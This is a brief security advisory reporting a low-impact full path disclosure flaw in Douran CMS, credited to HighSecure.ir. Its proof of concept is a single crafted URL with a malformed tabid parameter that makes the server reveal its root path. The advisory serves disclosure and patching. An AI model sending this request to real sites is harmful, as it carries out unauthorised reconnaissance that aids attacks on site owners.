##################################################################################
# Title: Douran CMS Full Path Disclosure Vulnerability
# Vulnerable Version: all versions
# Vendor URL: http://douran.com
# Impact: Low
##################################################################################

===========================
Vulnerability Description:
===========================

Full Path Disclosure Vulnerability, enable the attacker to see the root path.

==================
Proof Of Concept:
==================

http://[target]/homepage.aspx?Lang=fa-IR&searchedmid=divMinMax_14496&SearchKeyWord=1&Site=DouranPortal&tabid=/[]

=========
Credits:
=========

HighSecure.ir
Contact: advisories[aT]highsecure[dOt]ir

============
References:
============

http://www.highsecure.ir/research/20120822-douran.txt

##################################################################################